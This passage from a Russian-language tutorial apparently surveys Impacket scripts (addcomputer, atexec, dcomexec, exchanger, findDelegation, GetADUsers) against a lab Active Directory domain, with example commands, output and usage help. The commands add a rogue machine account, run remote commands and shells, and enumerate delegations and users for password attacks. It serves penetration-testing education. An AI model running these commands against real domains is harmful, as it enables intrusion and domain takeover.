\u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0438\u0437 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0432 \u0441\u043a\u0440\u044b\u0442\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u0432\u0441\u0435 \u0438\u043c\u0435\u044e\u0449\u0438\u0435\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b. 
\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u044b \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0437\u043e\u0440\u043d\u043e\u0439 \u044d\u043a\u0441\u043a\u0443\u0440\u0441\u0438\u0438 \u0432 \u0446\u0438\u0444\u0440\u043e\u0432\u0443\u044e \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c <b><font color=\"#3AC1EF\">Impacket vs Active Directory<\/font><\/b>. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432 \u043e\u0431\u0437\u043e\u0440 \u043d\u0435 \u0432\u0445\u043e\u0434\u044f\u0442 \u043f\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0438 \u0438\u043b\u0438 \u043d\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u043d\u0443\u0436\u043d\u044b \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u0447\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0438\u0434\u043d\u043e \u0438\u0437 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u0432 <s>\u0438 \u0437\u0434\u0440\u0430\u0432\u043e\u0433\u043e \u0441\u043c\u044b\u0441\u043b\u0430<\/s>.<\/p>\n<h3><font color=\"#3AC1EF\">\u258d addcomputer<\/font><\/h3>\n<p>  \u0421\u043a\u0440\u0438\u043f\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u0447\u0451\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d. 
\u041f\u043e\u043b\u0435\u0437\u0435\u043d \u0434\u043b\u044f \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0432 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u043f\u0441\u0435\u0432\u0434\u043e\u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435 \u0441\u043a\u0440\u0443\u043f\u0443\u043b\u0451\u0437\u043d\u044b\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440. \u041f\u043e\u0441\u043b\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u043e\u0441\u043d\u0430\u0441\u0442\u043a\u0435 Windows Server \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 <i>COMPUTER2<\/i>:<\/p>\n<pre><code class=\"bash\">addcomputer.py -computer-name 'COMPUTER2$' -computer-pass 'SomePassword' -dc-ip 192.168.1.13 ad.ruvds.ru\/admin:password [*] Successfully added machine account COMPUTER2$ with password SomePassword. 
<\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: addcomputer.py [-h] [-domain-netbios NETBIOSNAME] [-computer-name COMPUTER-NAME$] [-computer-pass password] [-no-add] [-delete] [-debug] [-method {SAMR,LDAPS}]                       [-port {139,445,636}] [-baseDN DC=test,DC=local] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]                       [-dc-host hostname] [-dc-ip ip]                       [domain\/]username[:password]  positional arguments:   [domain\/]username[:password]                         Account used to authenticate to DC.  optional arguments:   -h, --help            show this help message and exit   -domain-netbios NETBIOSNAME                         Domain NetBIOS name. Required if the DC has multiple domains.   -computer-name COMPUTER-NAME$                         Name of computer to add.If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.   -computer-pass password                         Password to set to computerIf omitted, a random [A-Za-z0-9]{32} will be used.   -no-add               Don't add a computer, only set password on existing one.   -delete               Delete an existing computer.   -debug                Turn DEBUG output ON   -method {SAMR,LDAPS}  Method of adding the computer.SAMR works over SMB.LDAPS has some certificate requirementsand isn't always available.   -port {139,445,636}   Destination port to connect to. SAMR defaults to 445, LDAPS to 636.  LDAP:   -baseDN DC=test,DC=local                         Set baseDN for LDAP.If ommited, the domain part (FQDN) specified in the account parameter will be used.   
-computer-group CN=Computers,DC=test,DC=local                         Group to which the account will be added.If omitted, CN=Computers will be used,  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will                         use the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used   -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d atexec<\/font><\/h3>\n<p>  \u0421\u043e\u0437\u0434\u0430\u0451\u0442 \u0432 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0435\u0433\u043e, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u0427\u0438\u0441\u0442\u043e\u0439 \u0432\u043e\u0434\u044b, \u0448\u0435\u043b\u043b-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a \u0437\u0430\u0434\u0430\u043d\u0438\u0439. 
\u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u043c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u043c \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0439 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u0439:<\/p>\n<pre><code class=\"bash\">atexec.py ad.ruvds.ru\/admin:password@192.168.1.13 whoami [!] This will work ONLY on Windows >= Vista [*] Creating task \\QNyQPpyj [*] Running task \\QNyQPpyj [*] Deleting task \\QNyQPpyj [*] Attempting to read ADMIN$\\Temp\\QNyQPpyj.tmp [*] Attempting to read ADMIN$\\Temp\\QNyQPpyj.tmp nt authority\\\u0441\u0438\u0441\u0442\u0435\u043c\u0430 <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: atexec.py [-h] [-session-id SESSION_ID] [-ts] [-silentcommand] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]                  [-keytab KEYTAB]                  target [command ...]  
positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   command               command to execute at the target  optional arguments:   -h, --help            show this help message and exit   -session-id SESSION_ID                         an existed logon session to use (no output, no cmd.exe)   -ts                   adds timestamp to every logging output   -silentcommand        does not execute cmd.exe to run given command (no output)   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. 
If omitted it will use the domain part (FQDN) specified in the target parameter   -keytab KEYTAB        Read keys for SPN from keytab file <\/code><\/pre>\n<p>  <\/div>\n<\/p><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d dcomexec<\/font><\/h3>\n<p>  \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f DCOM-\u043e\u0431\u044a\u0435\u043a\u0442 <i>ShellBrowserWindow<\/i> (\u0432 \u043f\u0440\u0438\u043c\u0435\u0440\u0435, <i>MMC20<\/i>). \u0427\u0442\u043e \u0441 \u044d\u0442\u0438\u043c \u0434\u0435\u043b\u0430\u0442\u044c \u0437\u0434\u0435\u0441\u044c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043d\u0435 \u043e\u0433\u043e\u0432\u0430\u0440\u0438\u0432\u0430\u044e, \u0442\u0430\u043a \u043a\u0430\u043a \u0448\u0435\u043b\u043b \u043d\u0430 \u0442\u043e \u0438 \u0435\u0441\u0442\u044c \u0448\u0435\u043b\u043b, \u0447\u0442\u043e\u0431\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c:<\/p>\n<pre><code class=\"bash\">dcomexec.py ad.ruvds.ru\/admin:password@192.168.1.13 -object MMC20  [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands  C:\\>ipconfig  Windows IP Configuration   Unknown adapter OpenVPN Wintun:     Media State . . . . . . . . . . . : Media disconnected    Connection-specific DNS Suffix  . :  Unknown adapter OpenVPN TAP-Windows6:     Connection-specific DNS Suffix  . :    IPv4 Address. . . . . . . . . . . : 192.168.5.13    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . :  Ethernet adapter Ethernet:     Connection-specific DNS Suffix  . :    IPv4 Address. . . . . . . . . . . : 192.168.1.13    Subnet Mask . . . . . 
. . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . : 192.168.1.1  C:\\> <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-com-version MAJOR_VERSION:MINOR_VERSION]                    [-shell-type {cmd,powershell}] [-silentcommand] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]                    target [command ...]  positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   command               command to execute at the target. If empty it will launch a semi-interactive shell  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default ADMIN$)   -nooutput             whether or not to print the output (no SMB connection created)   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec   -object [{ShellWindows,ShellBrowserWindow,MMC20}]                         DCOM object to be used to execute the shell command (default=ShellWindows)   -com-version MAJOR_VERSION:MINOR_VERSION                         DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 
5.7   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell   -silentcommand        does not execute cmd.exe to run given command (no output, cannot run dir\/cd\/etc.)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -A authfile           smbclient\/mount.cifs-style authentication file. See smbclient man page's -A option.   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d exchanger<\/font><\/h3>\n<p>  \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 <i>Exchange<\/i>. \u041d\u0430 \u0441\u0442\u0435\u043d\u0434\u0435 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439. 
\u0412 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b, \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0437\u0434\u0435\u0441\u044c \u0432 \u0430\u043a\u0430\u0434\u0435\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0446\u0435\u043b\u044f\u0445:<\/p>\n<pre><code class=\"bash\">exchanger.py ad.ruvds.ru\/admin:password@192.168.1.13 nspi list-tables -count [-] Protocol failed: RPC Proxy Client: NTLM authentication failed in RPC_IN_DATA channel: HTTP\/1.1 404 Not Found <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: exchanger.py [-h] [-debug] [-rpc-hostname RPC_HOSTNAME] [-hashes LMHASH:NTHASH] target {nspi} ...   
positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   {nspi}                A module name     nspi                Attack NSPI interface  optional arguments:   -h, --help            show this help message and exit   -debug                Turn DEBUG and EXTENDED output ON   -rpc-hostname RPC_HOSTNAME                         A name of the server in GUID (preferred) or NetBIOS name format (see description in the beggining of this file)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d findDelegation<\/font><\/h3>\n<p>  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0439. <b><font color=\"#3AC1EF\">Constrained Delegation<\/font><\/b> \u2013 \u0434\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431. \u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e <b><font color=\"#3AC1EF\">Unconstrained Delegation<\/font><\/b> \u2013 \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435. 
\u041d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u043e\u0432\u044b\u0445 \u0432 Active Directory \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u044f\u043c\u0443\u044e \u0434\u043e\u0440\u043e\u0433\u0443 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u043c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0430 \u0437\u0430\u0445\u0432\u0430\u0442\u043e\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u0434 \u0432\u0441\u0435\u043c \u0434\u043e\u043c\u0435\u043d\u043e\u043c. \u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0435\u0441\u043b\u0438 \u0442\u0430\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u043d\u0430 Windows Server \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u0442\u043e \u0432\u044b\u0432\u043e\u0434 \u0431\u0443\u0434\u0435\u0442, \u043a\u0430\u043a \u0432 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u043d\u0438\u0436\u0435: \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u0434\u043b\u044f \u0441\u043b\u0443\u0436\u0431 Ldap \u0438 <a href=\"https:\/\/ru.wikipedia.org\/wiki\/Server_Message_Block\">Cifs<\/a> \u0438 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <i>Backup<\/i>, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 <i>RUVDS-PC$<\/i>, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 
\u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0441\u043a\u043e\u0443\u043f:<\/p>\n<pre><code class=\"bash\">findDelegation.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13  AccountName  AccountType  DelegationType                      DelegationRightsTo -----------  -----------  ----------------------------------  ----------------------------------------------------------------- RUVDS-PC$    Computer     Unconstrained                       N\/A Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/AD Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK\/AD Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/DomainDnsZones.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ForestDnsZones.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru\/AD Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK\/AD <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: 
findDelegation.py [-h] [-target-domain TARGET_DOMAIN] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target   positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -target-domain TARGET_DOMAIN                         Domain to query\/request if different than the domain of the user. Allows for retrieving delegation info across trusts.   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d GetADUsers<\/font><\/h3>\n<p>  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043e\u043c\u0435\u043d\u0430. \u0421\u043a\u0440\u0438\u043f\u0442 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u043d\u0435 \u043e\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. 
\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0441\u043b\u043e\u0432\u0430\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u044f:<\/p>\n<pre><code class=\"bash\">GetADUsers.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13 -all  [*] Querying 192.168.1.13 for information about domain. Name                  Email                           PasswordLastSet      LastLogon --------------------  ------------------------------  -------------------  ------------------- \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440                                         2022-07-03 21:47:50.410770  2023-02-05 22:32:32.875495 \u0413\u043e\u0441\u0442\u044c                                                 &lt;never>              &lt;never> krbtgt                                                2022-07-21 11:57:31.728056  &lt;never> Ruvds                                                 2022-08-24 22:12:13.125652  2023-01-26 14:47:44.840025 test                                                  2023-01-12 20:56:06.969165  2023-01-26 10:15:10.800462 admin                                                 2023-01-24 20:05:11.514038  2023-01-26 10:45:42.058260 ca                                                    2023-01-26 10:17:49.333225  2023-01-26 10:23:01.488147 <\/code><\/pre>\n<p>  <i>LastLogon<\/i> \u2014 \u043a\u043e\u0433\u0434\u0430 \u0431\u044b\u043b \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0432\u0445\u043e\u0434 
\u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, <i>PasswordLastSet <\/i>\u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d \u043d\u0438\u0436\u0435.<\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target   positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -user username        Requests data for specific user   -all                  Return all users, including those with no email addresses and disabled accounts. When used with -user it will return user's info even if the account is                         disabled   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 